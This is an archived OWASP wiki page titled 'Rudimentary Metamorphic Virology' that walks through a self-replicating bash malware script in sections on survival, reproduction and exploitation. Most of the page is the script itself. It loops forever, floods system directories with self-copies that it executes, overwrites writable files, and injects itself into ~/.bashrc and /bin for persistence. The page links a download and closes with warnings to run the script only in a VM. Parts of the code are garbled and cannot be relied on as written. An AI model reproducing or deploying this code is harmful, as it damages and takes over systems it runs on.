This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Metamorphic Virology
Rudimentary Metamorphic Virology By Gregory Disney-Leugers
Download at: https://docs.google.com/a/owasp.org/file/d/0B3OSDccoP1KhbVkzWE1TZ3hSS0k/edit?usp=sharing
Virology should be viewed as evolutionary biology being used in code, to demonstrate this I wrote a bash script. This code is metamorphic in the since of self modifying and self propagating; This script covers the three main attributes of metamorphic virology methods of survival, reproduction, and exploitation.
Surivival:
#!/bin/bash trap INT for (( ; ; )) do
The first line "trap INT" creates a lock on the process meaning once its activated, ctrl+c can't stop the process. Generally speaking with a loop such as the second and third line a pid be created to ensure that it cloud be stopped. In this script no pid is created to ensure survival.
Reproduction:
#!/bin/bash export RESOLV_HOST_CONF=/etc/shadow trap INT for (( ; ; )) do FILE="/tmp/$(basename $0).$RANDOM." echo $FILE > $FILE FILES="/var/$(basename $0).$RANDOM." echo $FILES > $FILES FILEZ="/etc/$(basename $0).$RANDOM." echo $FILEZ > $FILEZ FILE="/tmp/$(basename $0).$RANDOM." echo $FILE > $FILE FILES="/var/$(basename $0).$RANDOM." echo $FILES > $FILES FILEZ="/etc/$(basename $0).$RANDOM." echo $FILEZ > $FILEZ FILER="/run/$(basename $0).$RANDOM." echo $FILER > $FILER FILEQ="/root/$(basename $0).$RANDOM." echo $FILEQ > $FILEQ
The script now has a loop with producing blank files, Roughly 7 a kernel second. The way the file is written it uses the basemame with a random output.
cd /root && chmod u+x /root/$(basename $0).$RANDOM. && cat >~/$(basename $0).$RANDOM. <<FSS #!/bin/bash trap INT for (( ; ; )) do FILE="/tmp/$(basename $0).$RANDOM." echo $FILE > $FILE FILES="/var/$(basename $0).$RANDOM." echo $FILES > $FILES FILEZ="/etc/$(basename $0).$RANDOM." echo $FILEZ > $FILEZ FILE="/tmp/$(basename $0).$RANDOM." echo $FILE > $FILE FILES="/var/$(basename $0).$RANDOM." echo $FILES > $FILES FILEZ="/etc/$(basename $0).$RANDOM." echo $FILEZ > $FILEZ FILER="/run/$(basename $0).$RANDOM." echo $FILER > $FILER FILEQ="/root/$(basename $0).$RANDOM." echo $FILEQ > $FILEQ
Using cat now the files are being written with the original loop reproduction script into the generated files.
ssh lt 2>/tmp/$(basename $0).$RANDOM. cat /tmp/$(basename $0).$RANDOM.|awk -F"\`" {'print $RANDOM'}|awk -F"\'" {'print $RANDOM'} while /bin/true ; do for i in $(basename $0)/* ; do if [ -w $i -a -c $i -a $i != $RANDOM ]; then cat $RANDOM > $i fi done done exec ~/$(basename $0).$RANDOM. FSS
Using cat now the tmp files are being written with a bidien payload. From FSS to FSS is one output file.
#!/bin/bash trap INT for (( ; ; )) do FILE="/tmp/linware.1554." echo /tmp/linware.13359. > /tmp/linware.13359. FILES="/var/linware.8552." echo /var/linware.13938. > /var/linware.13938. FILEZ="/etc/linware.15018." echo /etc/linware.1714. > /etc/linware.1714. FILE="/tmp/linware.12031." echo /tmp/linware.13359. > /tmp/linware.13359. FILES="/var/linware.28141." echo /var/linware.13938. > /var/linware.13938. FILEZ="/etc/linware.29119." echo /etc/linware.1714. > /etc/linware.1714. FILER="/run/linware.21852." echo /run/linware.18072. > /run/linware.18072. FILEQ="/root/linware.14767." echo /root/linware.22566. > /root/linware.22566. .... exec ~/linware.22566.
Here's a sample script of the output of the output script, at end of the script it executes another output script. This can be used to map the propagation of the malware.
Exploitation:
cat >~/.bashrc <<ASS /opt/linware /bin/linware /etc/linware /run/linware ASS cp /opt/linware /bin cp /opt/linware /etc exec /opt/linware exec ~/$(basename $0).$RANDOM
Using cat once again the script writes to the bashrc, to infect bash to ensure survival. At end of the loop script it initiates the script all over again.
https://docs.google.com/a/owasp.org/file/d/0B3OSDccoP1KhbVkzWE1TZ3hSS0k/edit?usp=sharing
WARNING: this script only be used in a controlled environment such as a VM.
WARNING: This script should be consider malicious.